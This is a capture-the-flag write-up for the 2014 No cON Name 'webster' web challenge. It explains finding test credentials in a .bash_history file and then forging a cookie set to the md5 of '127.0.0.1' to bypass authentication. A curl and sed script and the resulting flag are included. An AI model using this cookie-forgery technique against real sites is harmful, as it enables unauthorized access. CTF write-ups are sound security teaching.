choppers

No cON Name Quals 2014: webster

2014-09-15 00:00:00

Analysis

A guessing game; typical web challenge.

First, you must guess the username and password of test:test. There may have been another way to get this, but I found it buy digging through the .bash_history file on the explicit challenge server.

The next part was fiddling with a cookie that get set after logging in. The loc cookie is the md5 hash of an ip address that gets used by the authentication algorithm. By guessing to change the cookie's value to the md5 hash of '127.0.0.1', you win permission to download flag.txt.

Solution

#!/bin/sh

curl -k https://ctf.noconname.org/webster/login.php -c cookies.txt --data "username=test&password=test"
# md5('127.0.0.1') => f528764d624db129b32c21fbca0cb8d6
sed  's/c869d000ef5c6fdfa128b058d2865512/f528764d624db129b32c21fbca0cb8d6/g' cookies.txt > good_cookies.txt
curl -k https://ctf.noconname.org/webster/content.php?op=4 -b good_cookies.txt

Output

$ ./webster.sh

NCN_f528764d624db129b32c21fbca0cb8d6

$